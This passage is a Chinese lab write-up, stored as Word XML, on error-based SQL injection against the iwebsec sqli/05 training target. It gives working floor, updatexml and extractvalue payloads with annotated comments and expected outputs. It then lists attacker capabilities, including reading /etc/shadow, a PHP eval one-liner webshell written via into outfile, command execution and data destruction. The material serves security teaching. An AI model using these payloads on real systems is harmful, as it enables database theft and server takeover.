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7B461">
      <w:pPr>
        <w:spacing w:before="480" w:after="480" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>iwebsec sqli/05 数字型报错注入（floor/updatexml/extractvalue）完整文档（含漏洞危害）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226F4CC3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一、实验前提说明</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="79E7FD6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 注入类型：iwebsec sqli/05.php 为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数字型注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，无需单引号闭合，无需添加 --+ 注释符，添加会导致SQL语法报错；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD7C9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 注入点：URL参数 ?id=1，通过拼接注入语句触发报错，获取数据库敏感信息；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4E18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 核心漏洞：SQL语句未对输入参数进行过滤，直接拼接执行，导致攻击者可构造恶意语句，利用报错机制回显敏感数据；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A9B80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 预期核心回显：通过三种报错注入方式，均可爆出当前数据库名 iwebsec。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22713A36">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="heading_1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>二、三种报错注入详细解析（Payload+注释+原理）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="1712619E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（一）floor 报错注入（标准稳定版）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="144B0012">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="heading_3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. 最终可执行Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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C07A79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C6B08A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and (select 1 from (select count(*),concat(0x7e,database(),0x7e,floor(rand(0)*2)) as x from information_schema.tables group by x)a)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3984366E">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="heading_4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. 逐行详细注释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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711BA80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05E375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                             # 原始正常参数，保证页面初始执行逻辑为真，避免直接报错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and                                # 逻辑与运算符：当前面条件（id=1）为真时，才执行后面的注入语句，不破坏原SQL结构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(select 1 from                    # 外层嵌套查询：无实际业务意义，仅为满足MySQL语法规范，包裹内层报错核心语句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(select                        # 内层核心查询：触发floor报错的关键，负责构造重复键条件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count(*),                  # 聚合函数：必须配合group by使用，是触发报错机制的前提（group by需结合聚合函数才会创建临时表）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concat(                    # 字符串拼接函数：将敏感数据与随机数拼接成一个整体，便于报错时回显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0x7e,                  # 分隔符 ~（十六进制表示，避免使用引号，防止语法冲突）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database(),            # 注入核心目标：查询当前数据库名，可替换为version()（数据库版本）、user()（数据库连接用户）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0x7e,                  # 分隔符 ~：区分数据库名与随机数，使回显结果更清晰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floor(rand(0)*2)       # 生成固定伪随机序列：0、1、1、0、1、0...（rand(0)固定种子，保证序列不变，确保重复键出现）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) as x                     # 给拼接后的字符串起别名x，用于后续group by分组操作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from information_schema.tables # 从MySQL系统表查询数据：该表数据量充足，确保查询有结果，保证报错机制触发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group by x                     # 按别名x分组：核心触发点，分组时临时表插入重复键，导致报错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)a                             # 给内层子查询起别名a：MySQL语法强制要求，子查询作为from的数据源时必须有别名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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2704A16A">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="heading_5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. 底层原理分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="6F51321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floor报错注入的核心是「分组重复键报错」，依赖MySQL的group by分组机制与rand()函数的特性，具体流程如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289692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 rand(0)*2 由于种子固定，会生成不可变的伪随机序列（0、1、1、0、1、0...），确保每次执行结果一致，稳定触发报错；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE75D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 group by x 执行时，MySQL会先创建一张临时表，用于存储分组键（即别名x对应的拼接结果）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABB3CA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 临时表插入分组键时，会先计算一次floor(rand(0)*2)的值，插入后再次计算该值，导致两次计算结果不一致，出现重复的分组键；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203ADB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 MySQL临时表的分组键具有唯一性，重复键插入会触发「主键重复错误」，并将拼接在x中的敏感数据（如数据库名）随错误信息一起回显；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C4A3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 该注入方式不依赖原SQL查询的字段数，兼容性强，支持所有MySQL版本，且可回显无长度限制的敏感数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063F4EAE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="heading_6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4. 预期回显结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="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4154EA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5EBD6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Duplicate entry '~iwebsec~1' for key 'group_key'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E08B7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说明：从报错信息中可直接提取当前数据库名 iwebsec（~为我们设置的分隔符）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37EE54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（二）updatexml 报错注入（最简单常用版）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="3FD05089">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="heading_8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. 最终可执行Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8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789116C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8C6437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and updatexml(1,concat(0x7e,database(),0x7e),1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="545FC539">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. 逐行详细注释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9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77CE94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03FC16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                             # 原始正常参数，保证前面逻辑为真，使后续注入语句得以执行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and                                # 逻辑与运算符：连接原始条件与注入语句，确保注入语句被执行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updatexml(                        # MySQL内置XML修改函数：用于修改XML文档中的内容，参数格式错误时会触发报错回显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1,                            # 第一个参数：XML文档对象，可填写任意无效值（无需实际XML文档，仅为满足函数参数格式）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concat(0x7e,database(),0x7e), # 第二个参数：要求是合法的XPath路径（核心注入点）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                          # 此处拼接 ~数据库名~，属于非法XPath格式，强制触发函数报错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1                             # 第三个参数：XML文档中需要替换的新值，填写任意无效值即可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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1059BA3D">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. 底层原理分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="666754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updatexml报错注入的核心是「函数参数格式错误报错」，利用MySQL XML函数的语法限制，具体如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49582C5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 updatexml() 是MySQL专门用于修改XML数据的函数，其语法要求第二个参数必须是合法的XPath路径（如 /root/child）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA2088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 攻击者构造concat(0x7e,database(),0x7e)，将分隔符、数据库名拼接成字符串（如 ~iwebsec~），该字符串不符合XPath语法规范，属于非法参数；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4217A6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 当函数接收非法参数时，MySQL会抛出「XPath语法错误」，并将非法参数的具体内容（即我们拼接的数据库名）随错误信息回显到页面；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F24311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 该注入方式语法简单、成功率高，是最常用的报错注入方式，但存在局限性：单次回显的敏感数据长度不超过32位，超长数据需分段截取。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD8002">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="heading_11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4. 预期回显结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11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388A2B9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F6E230E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XPATH syntax error: '~iwebsec~'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F07B7B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说明：直接从报错信息中提取当前数据库名 iwebsec。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F965F9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（三）extractvalue 报错注入（简洁版）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="6E26E18E">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="heading_13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>1. 最终可执行Payload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13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11A2E61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6C22AD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and extractvalue(1,concat(0x7e,database(),0x7e))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="20D29397">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="heading_14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>2. 逐行详细注释</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14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C99FABD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B25AD9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sql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?id=1                              # 原始正常参数，保证前面逻辑为真，触发后续注入语句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and                                # 逻辑与运算符：连接原始条件与注入语句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extractvalue(                     # MySQL内置XML查询函数：用于从XML文档中提取指定路径的内容，参数非法时触发报错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1,                            # 第一个参数：XML文档对象，填写任意无效值即可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concat(0x7e,database(),0x7e)  # 第二个参数：要求是合法的XPath路径，此处拼接非法字符串，触发报错并回显数据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)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A2F2565">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="heading_15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3. 底层原理分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="565EFD7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extractvalue报错注入与updatexml报错注入原理99%一致，核心差异仅在于函数功能，具体如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374DC3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 extractvalue() 函数的功能是从XML文档中提取指定XPath路径对应的内容，其语法要求与updatexml()一致，第二个参数必须是合法的XPath路径；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041FBE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 攻击者构造非法的XPath参数（~数据库名~），使函数解析失败，抛出「XPath语法错误」；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A16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 错误信息会直接回显非法参数的内容，即我们拼接的敏感数据（数据库名）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE704C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 与updatexml相比，extractvalue语法更简洁（少一个参数），局限性相同（单次回显不超过32位），使用场景与updatexml完全一致。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F74D0A">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="heading_16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>4. 预期回显结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16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2DCFD2D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E612E51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Plain Text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XPATH syntax error: '~iwebsec~'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57A45F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说明：直接从报错信息中提取当前数据库名 iwebsec。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7411ACFE">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="heading_17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>三、三种报错注入对比总结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17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70"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2070"/>
        <w:gridCol w:w="2070"/>
      </w:tblGrid>
      <w:tr w14:paraId="25450682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D6743E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注入方式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C6C5AA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触发原理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9B4D9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核心特点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0C100C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局限性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="580DF30E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777BB8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floor 报错注入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1BCAF1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group by分组 + rand()固定序列，触发临时表重复键报错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75693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兼容性强、不依赖字段数、回显无长度限制、最稳定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6356CC6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语法相对复杂，需嵌套子查询</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="18C3059C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28920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updatexml 报错注入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09CE8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XML函数参数非法（非法XPath），触发语法报错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7911D0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语法最简单、成功率最高、最常用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51B3D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单次回显不超过32位，需分段截取超长数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5CB6AE8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D940AB0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extractvalue 报错注入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E86A847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与updatexml一致，XML函数非法XPath参数报错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6F36FF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语法简洁，使用场景与updatexml一致</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="207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B0FFF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与updatexml相同，单次回显不超过32位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24E94CA3">
      <w:pPr>
        <w:spacing w:before="380" w:after="140" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="heading_18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>四、漏洞危害分析（攻击者可利用该漏洞执行的操作）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="4F62AB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iwebsec sqli/05 数字型报错注入属于高危漏洞，攻击者可通过该漏洞逐步渗透，从获取敏感数据到控制整个服务器，甚至横向渗透内网，具体危害如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19553FD0">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="heading_19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>1. 获取数据库基础信息（渗透前提）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="25820FF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攻击者可通过修改注入语句中的查询函数，获取数据库核心基础信息，为后续渗透提供支撑：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407AEEB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爆出当前数据库名（如 iwebsec），定位核心业务数据库；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505B1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爆出MySQL版本号、操作系统版本，判断漏洞兼容性与服务器环境；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF490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爆出当前数据库连接用户（如 root、webuser），判断用户权限等级；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E071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查看数据库安装路径、配置文件位置等信息，为后续读取文件做准备。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184835CE">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="heading_20"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>2. 枚举所有数据库与数据表（定位敏感数据）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="42E13B0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攻击者可通过拼接查询语句，遍历MySQL中所有数据库和数据表，精准定位敏感数据所在位置：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732EF6F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枚举所有数据库：包括业务库（iwebsec）、系统库（mysql、information_schema）、同服务器其他站点数据库；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515766D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枚举目标库（iwebsec）下所有数据表：如 user（用户表）、admin（管理员表）、order（订单表）、pay（支付表）等，直接锁定最有价值的数据表。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C76048">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="heading_21"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3. 获取表结构与窃取敏感数据（核心危害）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="7D026F1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这是该漏洞最直接、最严重的危害，攻击者可获取表中所有字段，并读取核心敏感数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD4BC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查看数据表字段：如 user 表的 id、username、password、phone、email 等字段，明确敏感数据存储位置；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E89CFD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窃取管理员账号密码：通常密码为MD5等加密格式，攻击者可通过彩虹表破解，获取后台登录凭证；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E99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窃取普通用户信息：包括账号、手机号、邮箱、身份证号等隐私数据，造成用户信息泄露；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C4971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窃取业务敏感数据：如订单记录、支付信息、商品价格、后台配置、密钥等，影响业务正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DB518A">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="heading_22"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>4. 读取服务器本地文件（渗透至操作系统）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="51B453B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若数据库连接用户权限较高（如 root），攻击者可利用报错注入结合 load_file() 函数，读取服务器本地敏感文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C26A17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读取系统配置文件：如 /etc/passwd（系统用户列表）、/etc/shadow（系统用户密码哈希）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B06180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读取网站文件：如网站源码、数据库配置文件（包含数据库账号密码、连接地址等）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D06B2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读取日志文件、备份文件：获取服务器运行记录、敏感操作记录，进一步寻找其他漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178E1879">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="heading_23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>5. 写入恶意文件，获取Webshell（控制网站）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="1A76B18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高权限下，攻击者可利用 into outfile 等语句，向网站可访问目录写入恶意文件，获取Webshell：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6323C4E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写入一句话木马：如 &lt;?php @eval($_POST['cmd']);?&gt;，通过蚁剑、菜刀等工具连接，直接控制网站后台；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF8EA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篡改网站页面：插入恶意广告、违法信息，或篡改网站内容，影响网站公信力；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734A8E4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植入病毒、木马：向服务器写入恶意程序，进一步控制服务器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF6F8A">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="heading_24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>6. 执行系统命令，控制服务器（高危）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="498F3B4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若MySQL以root权限运行，且开启 secure_file_priv 等相关权限，攻击者可通过报错注入执行操作系统命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7CB39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执行系统命令：如 ls（查看目录）、whoami（查看当前用户）、rm（删除文件）等；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09B7D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添加系统用户：创建新的管理员账号，实现远程登录服务器；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4519ABB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控制整个服务器：修改系统配置、关闭防火墙、开启后门，实现对服务器的完全控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF09F5B">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>7. 破坏数据，造成业务瘫痪</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="7D8FC0F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攻击者可通过注入语句修改、删除数据库数据，造成网站业务瘫痪：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FE96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删除数据：执行 delete、drop 语句，删库、删表、清空数据，导致数据永久丢失；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BEB82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篡改数据：修改商品价格、用户余额、订单状态等，影响业务正常运营；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2DCDB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插入恶意数据：向数据库插入违法、违规信息，导致网站被处罚、关停。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9686F0">
      <w:pPr>
        <w:spacing w:before="320" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_26"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>8. 横向渗透内网（扩大危害范围）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="69E39B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拿到网站服务器控制权后，攻击者可以此为跳板，横向渗透内网其他主机：</w:t>
      </w:r>
    </w:p>
